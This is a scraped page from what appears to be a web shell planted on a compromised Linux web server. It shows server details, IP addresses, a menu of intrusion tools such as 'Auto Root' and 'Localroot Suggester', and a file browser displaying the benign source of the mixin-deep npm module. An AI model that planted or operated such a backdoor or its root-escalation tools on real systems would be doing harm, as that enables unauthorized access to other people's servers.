Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.217.230.80
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
mixin-deep /
Delete
Unzip
Name
Size
Permission
Date
Action
node_modules
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
LICENSE
1.07
KB
-rw-r--r--
1985-10-26 08:15
README.md
3.67
KB
-rw-r--r--
1985-10-26 08:15
index.js
1.08
KB
-rw-r--r--
1985-10-26 08:15
package.json
2.08
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
'use strict'; var isExtendable = require('is-extendable'); var forIn = require('for-in'); function mixinDeep(target, objects) { var len = arguments.length, i = 0; while (++i < len) { var obj = arguments[i]; if (isObject(obj)) { forIn(obj, copy, target); } } return target; } /** * Copy properties from the source object to the * target object. * * @param {*} `val` * @param {String} `key` */ function copy(val, key) { if (!isValidKey(key)) { return; } var obj = this[key]; if (isObject(val) && isObject(obj)) { mixinDeep(obj, val); } else { this[key] = val; } } /** * Returns true if `val` is an object or function. * * @param {any} val * @return {Boolean} */ function isObject(val) { return isExtendable(val) && !Array.isArray(val); } /** * Returns true if `key` is a valid key to use when extending objects. * * @param {String} `key` * @return {Boolean} */ function isValidKey(key) { return key !== '__proto__' && key !== 'constructor' && key !== 'prototype'; }; /** * Expose `mixinDeep` */ module.exports = mixinDeep;